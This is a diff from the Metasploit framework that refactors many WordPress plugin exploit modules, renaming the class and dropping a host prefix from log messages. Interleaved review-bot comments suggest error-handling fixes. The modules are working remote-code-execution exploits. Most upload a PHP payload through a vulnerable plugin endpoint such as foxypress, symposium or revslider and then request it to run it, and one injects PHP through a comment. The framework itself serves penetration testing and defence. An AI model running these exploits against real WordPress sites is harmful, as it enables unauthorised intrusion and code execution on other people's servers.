@@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename) data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication) - print_status("#{peer} - Uploading payload to #{payload_url}") + print_status("Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => uploader_url, @@ -152,9 +152,9 @@ class Metasploit3 < Msf::Exploit::Remote ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? - vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200 + vprint_error("Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") register_files_for_cleanup(uploaded_filename) res = send_request_cgi( { @@ -163,9 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if !res.nil? && res.code == 404 - print_error("#{peer} - Failed to upload the payload") + print_error("Failed to upload the payload") else - print_good("#{peer} - Executed payload") + print_good("Executed payload") end end end diff --git a/modules/exploits/unix/webapp/wp_foxypress_upload.rb b/modules/exploits/unix/webapp/wp_foxypress_upload.rb index 1fefb811ca..5b46f5a16a 100644 --- a/modules/exploits/unix/webapp/wp_foxypress_upload.rb +++ b/modules/exploits/unix/webapp/wp_foxypress_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress 
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = Rex::MIME::Message.new post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") - print_status("#{peer} - Sending PHP payload") + print_status("Sending PHP payload") res = send_request_cgi( 'method' => 'POST', @@ -67,19 +67,19 @@ class Metasploit3 < Msf::Exploit::Remote ) if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end filename = "#{Regexp.last_match[1]}.php" - print_good("#{peer} - Our payload is at: #{filename}. Calling payload...") + print_good("Our payload is at: #{filename}. Calling payload...") register_files_for_cleanup(filename) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename) ) - print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200 + print_error("Server returned #{res.code}") if res && res.code != 200 end end diff --git a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb index 1fb64e7e7c..805a886437 100644 --- a/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress 
@@ -46,10 +46,10 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") filename = "#{rand_text_alpha_lower(5)}.php" - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'), @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file #{filename}") + print_status("Calling uploaded file #{filename}") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") }, 5 diff --git a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb index f7e59f655a..b6e1d7ddc1 100644 --- a/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb +++ b/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rbmysql' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb index 54485a0287..9a77ef8950 100644 --- a/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'socket' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper 
@@ -76,11 +76,11 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php" data = generate_mime_message(payload, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => holding_pattern_uploader_url, @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 payload_url = normalize_uri(holding_pattern_uploads_url, payload_name) - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") register_files_for_cleanup(payload_name) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end diff --git a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb index f06a853ea6..feae3662d5 100644 --- a/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body.include?(php_page_name) - print_good("#{peer} - Our payload is at: #{php_page_name}.") + print_good("Our payload is at: #{php_page_name}.") register_files_for_cleanup(php_page_name) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") 
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not answer') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_plugins, 'inboundio-marketing', 'admin', 'partials', 'uploaded_csv', php_page_name) }, 5 diff --git a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb index 6338d3ed78..fd7a419a6c 100644 --- a/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb +++ b/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -66,13 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end - print_status("#{peer} - Calling payload ...") + print_status("Calling payload ...") send_request_cgi({ 'uri' => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', php_pagename) diff --git a/modules/exploits/unix/webapp/wp_lastpost_exec.rb b/modules/exploits/unix/webapp/wp_lastpost_exec.rb index f807f9e58c..8f5fc9ba22 100644 --- a/modules/exploits/unix/webapp/wp_lastpost_exec.rb +++ b/modules/exploits/unix/webapp/wp_lastpost_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp 
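Review bot: The `else` branch of the `@@ -66,13` hunk in wp_infusionsoft_upload.rb calls `res.code` inside the `fail_with` message, but that branch is also reached when `res` is nil, since the condition starts with `res &&`. A request that gets no response would then raise `NoMethodError` instead of the intended failure. Guard the message, e.g. `fail_with(Failure::UnexpectedReply, "Unable to deploy payload, server returned #{res ? res.code : 'no response'}")`. The method body starts before the hunk.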
diff --git a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb index 806e529145..c7027abc93 100644 --- a/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue JSON::ParserError fail_with(Failure::Unknown, 'Unable to parse JSON data for the filename') end - print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...") + print_good("Our payload is at: #{new_php_pagename}. Calling payload...") register_files_for_cleanup(new_php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown,'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb index a0a6ac4c0e..9b10986e87 100644 --- a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb +++ b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient 
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(target_uri.path) #get upload filepath - print_status("#{peer} - Getting the upload path...") + print_status("Getting the upload path...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php') @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"") post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"") - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") n_data = post_data.to_s @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to upload payload") end - print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...") + print_good("Payload uploaded successfully. Disclosing the payload path...") #get path to payload res = send_request_cgi({ 'method' => 'GET', @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(File::basename(u.path)) - print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...") + print_good("Our payload is at: #{u.path}! Executing payload...") send_request_cgi({ 'method' => 'GET', 'uri' => u.path diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb index 765e103f5a..941dc8f538 100644 --- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper 
@@ -72,17 +72,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Authenticating using #{username}:#{password}...") + print_status("Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) data = generate_mime_message(payload, payload_name) upload_dir = "#{Rex::Text.rand_text_alpha(5)}/" - print_status("#{peer} - Uploading payload to #{upload_dir}...") + print_status("Uploading payload to #{upload_dir}...") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_ajax, @@ -94,9 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_good("#{peer} - Uploaded the payload") + print_good("Uploaded the payload") - print_status("#{peer} - Parsing server response...") + print_status("Parsing server response...") begin json = JSON.parse(res.body) if json.nil? || json['files'].nil? || json['files'][0].nil? || json['files'][0]['name'].nil? 
@@ -105,17 +105,17 @@ class Metasploit3 < Msf::Exploit::Remote uploaded_name = json['files'][0]['name'][0..-5] php_file_name = "#{uploaded_name}.php" payload_url = normalize_uri(wordpress_url_backend, upload_dir, uploaded_name, php_file_name) - print_good("#{peer} - Parsed response") + print_good("Parsed response") register_files_for_cleanup(php_file_name) register_files_for_cleanup("../#{uploaded_name}.zip") - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) - print_good("#{peer} - Executed payload") + print_good("Executed payload") end rescue fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 48bc1b3f85..a75eefc24b 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient @@ -81,11 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - #{target_uri} does not seeem to be WordPress site") end - print_status("#{peer} - Starting up web service...") + print_status("Starting up web service...") start_service payload_uri = generate_payload_uri - vprint_status("#{peer} - Using URI #{payload_uri}") + vprint_status("Using URI #{payload_uri}") random_file_name = rand_text_alphanumeric(rand(5) + 5) post = { 
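Review bot: The bare `rescue` at the end of the `@@ -105,17` hunk covers the payload request and the cleanup registration as well as the JSON handling, so any StandardError raised there is reported as 'Unable to parse the server response'. Narrowing it to `rescue JSON::ParserError`, as wp_nmediawebsite_file_upload.rb does in this same commit, keeps the message accurate and lets other failures surface with their own text. The matching `begin` sits in the previous hunk, so the exact extent of the block should be confirmed against the full file.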
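Review bot: The `fail_with` message at the top of the `@@ -81,11` hunk in wp_pixabay_images_upload.rb reads `does not seeem to be WordPress site`; it should read `does not seem to be a WordPress site`. The enclosing method starts outside the hunk.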
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}" } - print_status("#{peer} - Uploading payload #{random_file_name}...") + print_status("Uploading payload #{random_file_name}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend), @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") datastore['TRIES'].times do |i| payload_name = "#{random_file_name}_#{server_epoch_time + i}.php" res = call_payload(payload_name) @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = wordpress_and_online? unless res - vprint_error("#{peer} - It doesn't look like a WordPress site") + vprint_error("It doesn't look like a WordPress site") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb index 18118ed20c..d71747cf93 100644 --- a/modules/exploits/unix/webapp/wp_platform_exec.rb +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('pagelines', nil, nil, 'form-data; name="page"') post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") send_request_cgi({ 'method' => 'POST', 'uri' => wordpress_url_admin_post, diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index 567ac81937..be24e09124 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb 
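Review bot: `DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT')` in the `@@ -110,7` hunk is handed the header value with no visible check that the response carried a `Date` header. A missing header would raise from `strptime` rather than ending the run with a clear failure. A guard before the parse, such as `fail_with(Failure::UnexpectedReply, 'No usable Date header in the response') unless res.headers['date']`, would cover that case. The lines between this hunk and the previous one are not shown, so such a check may already exist there.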
+++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"") post_data = data.to_s - print_status("#{peer} - Uploading payload #{payload_name}") + print_status("Uploading payload #{payload_name}") res = send_request_cgi( 'method' => 'POST', 'uri' => request_uri, @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote upload_uri = normalize_uri(res.body) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw( 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb index 363b9441a4..7590f4caef 100644 --- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /success|#{php_pagename}/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") 
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb index 6ae240b2d9..c79b3069df 100644 --- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -77,8 +77,8 @@ class Metasploit3 < Msf::Exploit::Remote # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) - print_good("#{peer} - Our payload is at: #{final_uri}") - print_status("#{peer} - Calling payload...") + print_good("Our payload is at: #{final_uri}") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 diff --git a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb index b1f4e67ad4..b6d53feb0a 100644 --- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb +++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress 
@@ -60,14 +60,14 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login as #{user}") + print_status("Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as #{user}") + print_error("Unable to login as #{user}") return end - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") filename = "#{rand_text_alpha_lower(8)}.php" data = Rex::MIME::Message.new @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"") post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file #{filename}") + print_status("Calling uploaded file #{filename}") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename) ) diff --git a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb index f683aa071f..620594fc2f 100644 --- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper 
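Review bot: In `exploit`, in the `@@ -60,14 +60,14 @@` hunk of wp_slideshowgallery_upload.rb, a failed login is reported with `print_error("Unable to login as #{user}")` followed by a bare `return`, so the run ends without a failure reason. wp_total_cache_exec.rb in this same diff uses `fail_with(Failure::NoAccess, ...)` for the same condition. Doing the same here, `fail_with(Failure::NoAccess, "Unable to login as #{user}") if cookie.nil?`, would record why the run stopped. wp_wptouch_file_upload.rb (`@@ -117,29 +117,29 @@`) has the same pattern for its login, nonce and upload failures. The method body continues outside the hunk.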
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload") + print_status("Preparing payload") unique_name = Rex::Text.rand_text_alpha(10) payload_name = "#{unique_name}.php" symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php') @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote data = generate_mime_message(payload, payload_name, unique_name, symposium_url) symposium_url = normalize_uri(symposium_url, 'index.php') - print_status("#{peer} - Uploading payload to #{payload_url}") + print_status("Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => symposium_url, @@ -74,22 +74,22 @@ class Metasploit3 < Msf::Exploit::Remote ) if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0' - print_good("#{peer} - Uploaded the payload") + print_good("Uploaded the payload") register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) - print_good("#{peer} - Executed payload") + print_good("Executed payload") else if res.nil? fail_with(Failure::Unreachable, "No response from the target") else - vprint_error("#{peer} - HTTP Status: #{res.code}") - vprint_error("#{peer} - Server returned: #{res.body}") + vprint_error("HTTP Status: #{res.code}") + vprint_error("Server returned: #{res.body}") fail_with(Failure::UnexpectedReply, "Failed to upload the payload") end end diff --git a/modules/exploits/unix/webapp/wp_total_cache_exec.rb b/modules/exploits/unix/webapp/wp_total_cache_exec.rb index a38a65f0f1..8380660362 100644 --- a/modules/exploits/unix/webapp/wp_total_cache_exec.rb +++ b/modules/exploits/unix/webapp/wp_total_cache_exec.rb 
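Review bot: `vprint_error("Server returned: #{res.body}")` in the `@@ -74,22 +74,22 @@` hunk of wp_symposium_shell_upload.rb writes the remote server's whole response body to the operator's console unmodified. That body is untrusted and unbounded, so it can flood the output or carry control characters into the terminal and any spooled log. Printing a bounded, escaped form such as `vprint_error("Server returned: #{res.body[0, 200].inspect}")` keeps the diagnostic without that exposure.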
@@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient 
@@ -106,44 +106,44 @@ class Metasploit3 < Msf::Exploit::Remote @auth = require_auth? if @auth - print_status("#{peer} - Trying to login...") + print_status("Trying to login...") @cookie = wordpress_login(@user, @password) if @cookie.nil? fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful") end - print_status("#{peer} - login successful") + print_status("login successful") else - print_status("#{peer} - Trying unauthenticated exploitation...") + print_status("Trying unauthenticated exploitation...") end if datastore['POSTID'] and datastore['POSTID'] != 0 @post_id = datastore['POSTID'] - print_status("#{peer} - Using the user supplied POST ID #{@post_id}...") + print_status("Using the user supplied POST ID #{@post_id}...") else - print_status("#{peer} - Trying to get posts from feed...") + print_status("Trying to get posts from feed...") all_posts = wordpress_get_all_blog_posts_via_feed # First try all blog posts provided by feed if all_posts all_posts.each do |p| - vprint_status("#{peer} - Checking #{p}...") + vprint_status("Checking #{p}...") enabled = wordpress_post_comments_enabled?(p, @cookie) @post_id = get_post_id_from_body(enabled) if @post_id - print_status("#{peer} - Found Post POST ID #{@post_id}...") + print_status("Found Post POST ID #{@post_id}...") break end end end # if nothing found, bruteforce a post id unless @post_id - print_status("#{peer} - Nothing found. Trying to brute force a valid POST ID...") + print_status("Nothing found. Trying to brute force a valid POST ID...") min_post_id = datastore['MIN_POST_ID'] max_post_id = datastore['MAX_POST_ID'] @post_id = wordpress_bruteforce_valid_post_id_with_comments_enabled(min_post_id, max_post_id, @cookie) if @post_id.nil? fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment") else - print_status("#{peer} - Using the brute forced POST ID #{@post_id}...") + print_status("Using the brute forced POST ID #{@post_id}...") end end end 
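Review bot: The message in `fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment")`, near the end of this `@@ -106,44 +106,44 @@` hunk, breaks off mid-sentence. Judging by the `wordpress_bruteforce_valid_post_id_with_comments_enabled` call just above it, the intended text is probably `"Unable to post without a valid POST ID where comments are enabled"`. In the same hunk, `"login successful"` and `"Found Post POST ID #{@post_id}..."` could be tidied to `"Login successful"` and `"Found POST ID #{@post_id}..."`. The enclosing method starts and ends outside the hunk.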
@@ -151,14 +151,14 @@ class Metasploit3 < Msf::Exploit::Remote random_test = rand_text_alpha(64) @sum = Rex::Text.sha1(random_test) - print_status("#{peer} - Injecting the PHP Code in a comment...") + print_status("Injecting the PHP Code in a comment...") text = Rex::Text::rand_text_alpha(10) post_uri = post_comment(text) if post_uri.nil? fail_with(Failure::Unknown, "#{peer} - Expected redirection not returned") end - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") options = { 'method' => 'GET', 'uri' => post_uri, diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb index cba67e8185..975d7d004a 100644 --- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb +++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'ERROR') end - 